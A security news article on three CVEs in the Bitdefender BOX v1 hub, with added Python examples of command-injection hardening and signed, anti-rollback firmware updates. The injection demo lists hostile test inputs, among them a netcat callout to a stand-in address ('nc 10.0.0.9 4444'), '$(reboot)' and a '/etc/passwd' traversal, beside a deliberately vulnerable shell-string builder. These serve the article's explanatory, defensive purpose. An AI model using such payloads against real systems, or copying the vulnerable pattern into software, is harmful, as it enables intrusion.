
Image: Bitdefender
Bitdefender has issued a security advisory detailing three vulnerabilities, two of them rated critical, in the Bitdefender BOX v1, a now-discontinued security hub designed to protect smart home devices. The flaws, tracked as CVE-2024-13870, CVE-2024-13871, and CVE-2024-13872, could allow unauthenticated attackers to execute arbitrary commands, roll the firmware back to an older version, or tamper with the update mechanism, in the worst case leading to remote code execution.
Outdated but Still Exploitable
The Bitdefender BOX v1, though no longer sold or supported, remains in use in many households. The device was initially marketed as an all-in-one cybersecurity solution for “computers, smartphones, tablets, baby monitors, game consoles, smart TVs, and everything that’s connected in your household.” However, its vulnerabilities leave users exposed to significant security risks.
CVE-2024-13870: Unauthenticated Firmware Downgrade
The first of the reported vulnerabilities, CVE-2024-13870 (CVSS 1.8), allows an attacker within Wi-Fi range to force the device into Recovery Mode and downgrade its firmware to an older, potentially vulnerable version. The flaw stems from improper access controls that fail to prevent unauthorized firmware rollbacks, so an attacker who can reach the device wirelessly can reintroduce bugs that a later firmware had already fixed.
CVE-2024-13871: Command Injection Vulnerability
A more severe vulnerability, CVE-2024-13871 (CVSS 9.4), resides in the /check_image_and_trigger_recovery API endpoint of firmware version 1.3.11.490. This flaw enables an unauthenticated, network-adjacent attacker to inject and execute arbitrary system commands. In practical terms, this grants an attacker complete control over the device, allowing them to manipulate traffic, disable security protections, or use the BOX v1 as a pivot point for attacking other devices on the home network.
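The advisory does not disclose which parameter of the endpoint reaches a shell, so the following is an added illustration of the command-injection class rather than Bitdefender's code: a hypothetical "check image" handler that builds a shell string from an untrusted image name, beside a hardened version that allow-list validates the name and passes an argv list so no shell parses it. The `fw-verify` binary, the firmware directory and the payloads are all constructed for the example.

```python
"""Command-injection class illustration for a 'check image' style endpoint.

Added example; not the BOX v1 firmware's code. The binary name, the
directory and the request values below are constructed for the demo.
"""
import re

FIRMWARE_DIR = "/tmp/firmware"  # constructed path

# Allow-list: alphanumeric start, then alphanumerics, '.', '_' or '-'.
# No '/', no leading '.', no shell metacharacters can pass this.
_SAFE_IMAGE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def build_check_command_vulnerable(image: str) -> str:
    """Vulnerable pattern: untrusted input concatenated into a shell string.

    If this string is handed to os.system() or subprocess.run(..., shell=True),
    the shell parses metacharacters (';', '|', '`', '$()') inside `image`,
    so 'fw.bin; id' runs 'id' as a second command.
    """
    return f"fw-verify {FIRMWARE_DIR}/{image}"


def build_check_command_hardened(image: str) -> list:
    """Hardened pattern: validate against an allow-list, then return an argv
    list for subprocess.run(argv, shell=False). No shell is ever involved, and
    a rejected name never reaches the command at all."""
    if not _SAFE_IMAGE_NAME.match(image):
        raise ValueError("rejected image name")
    return ["fw-verify", f"{FIRMWARE_DIR}/{image}"]


def demo() -> dict:
    """Run both builders over constructed request values and summarise."""
    benign = "fw-1.3.11.510.bin"
    payloads = ["fw.bin; id", "fw.bin|nc 10.0.0.9 4444", "$(reboot)", "../../etc/passwd"]
    results = {"benign_hardened": build_check_command_hardened(benign)}
    for p in payloads:
        # The vulnerable builder happily embeds the payload verbatim.
        results[f"vuln:{p}"] = p in build_check_command_vulnerable(p)
        try:
            build_check_command_hardened(p)
            results[f"hard:{p}"] = "accepted"
        except ValueError:
            results[f"hard:{p}"] = "rejected"
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:40} {v}")
```

Beyond the allow-list, the argv form is the actual fix: even a name that slipped past validation would arrive in the child process as a single argument, never as shell syntax.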
CVE-2024-13872: Insecure Update Mechanism
Perhaps the most alarming issue is CVE-2024-13872 (CVSS 9.4), which affects Bitdefender Box versions 1.3.11.490 through 1.3.11.505. According to the advisory, the device “uses the insecure HTTP protocol to download assets over the Internet to update and restart daemons and detection rules on the devices.” This flaw allows attackers to perform Man-in-the-Middle (MITM) attacks, injecting malicious updates that could lead to remote code execution.
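Both of the unpatched flaws come down to the updater trusting what arrives over the network: CVE-2024-13872 because the transport is plaintext HTTP and CVE-2024-13870 because nothing stops an older image from being installed. The following is an added example, not Bitdefender's code, of the two checks an updater needs regardless of transport: a signature over a manifest that binds the payload hash and version, plus an anti-rollback comparison against the installed version. Because it must run with the standard library only, HMAC-SHA256 with a constructed key stands in for the asymmetric signature (e.g. Ed25519 with only the public key on the device) that a real updater would use; the manifests, payload bytes and version numbers are constructed for the demo.

```python
"""Signed manifest + anti-rollback update verification (added illustration).

Not the BOX v1 updater. HMAC here is a stand-in for an asymmetric signature
so the example runs offline with the standard library; a real device holds
only a public key. All manifests, payloads and versions are constructed.
"""
import hashlib
import hmac
import json

VENDOR_KEY = b"constructed-stand-in-for-vendor-signing-key"

# Constructed firmware blobs.
GOOD_PAYLOAD = b"firmware 1.3.11.510 (constructed bytes)"
EVIL_PAYLOAD = b"firmware with attacker implant (constructed bytes)"
OLD_PAYLOAD = b"firmware 1.3.11.490 (constructed bytes)"


def _canonical(manifest: dict) -> bytes:
    # Deterministic serialisation so signer and verifier hash identical bytes.
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(manifest: dict, key: bytes = VENDOR_KEY) -> str:
    return hmac.new(key, _canonical(manifest), hashlib.sha256).hexdigest()


def _version_tuple(v: str) -> tuple:
    return tuple(int(p) for p in v.split("."))


def verify_update(manifest: dict, signature: str, payload: bytes,
                  installed_version: str, key: bytes = VENDOR_KEY) -> str:
    """Return 'ok' or the first failing check; install only on 'ok'."""
    # 1. Authenticity: the manifest must carry a valid vendor signature.
    #    A MITM on plaintext HTTP can rewrite the manifest, but cannot re-sign it.
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return "bad-signature"
    # 2. Anti-rollback: a genuine but older signed image is still refused.
    if _version_tuple(manifest["version"]) <= _version_tuple(installed_version):
        return "rollback"
    # 3. Integrity: the payload must match the hash the signed manifest binds.
    if hashlib.sha256(payload).hexdigest() != manifest["sha256"]:
        return "hash-mismatch"
    return "ok"


def make_manifest(version: str, payload: bytes) -> dict:
    return {"version": version,
            "sha256": hashlib.sha256(payload).hexdigest(),
            "url": "http://updates.example/fw.bin"}  # constructed URL


def demo(installed: str = "1.3.11.505") -> dict:
    """Four scenarios: a clean update and three things a MITM or local attacker tries."""
    good = make_manifest("1.3.11.510", GOOD_PAYLOAD)
    sig = sign_manifest(good)
    results = {"legit": verify_update(good, sig, GOOD_PAYLOAD, installed)}
    # MITM swaps the firmware bytes but leaves the signed manifest alone.
    results["mitm_payload_swap"] = verify_update(good, sig, EVIL_PAYLOAD, installed)
    # MITM also edits the manifest hash to match the implant; signature no longer verifies.
    tampered = dict(good, sha256=hashlib.sha256(EVIL_PAYLOAD).hexdigest())
    results["mitm_manifest_edit"] = verify_update(tampered, sig, EVIL_PAYLOAD, installed)
    # Attacker replays a genuine, correctly signed older image.
    old = make_manifest("1.3.11.490", OLD_PAYLOAD)
    results["rollback_replay"] = verify_update(old, sign_manifest(old), OLD_PAYLOAD, installed)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:20} {v}")
```

The point of the replay scenario is that a signature alone does not close the downgrade hole: the old image is authentic, so only the version comparison against the installed release stops it, and that comparison has to be enforced in the recovery path too, not just in the normal update path.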
Mitigation and Recommendations
Bitdefender has pushed an automatic update to version 1.3.11.510 that addresses CVE-2024-13871, but the company stresses that the product is no longer supported, so the firmware-downgrade and plaintext-update issues remain unpatched. Given the severity of those remaining flaws and the fact that no further fixes will ship, users are strongly advised to retire the Bitdefender BOX v1 and migrate to a modern, actively maintained security solution.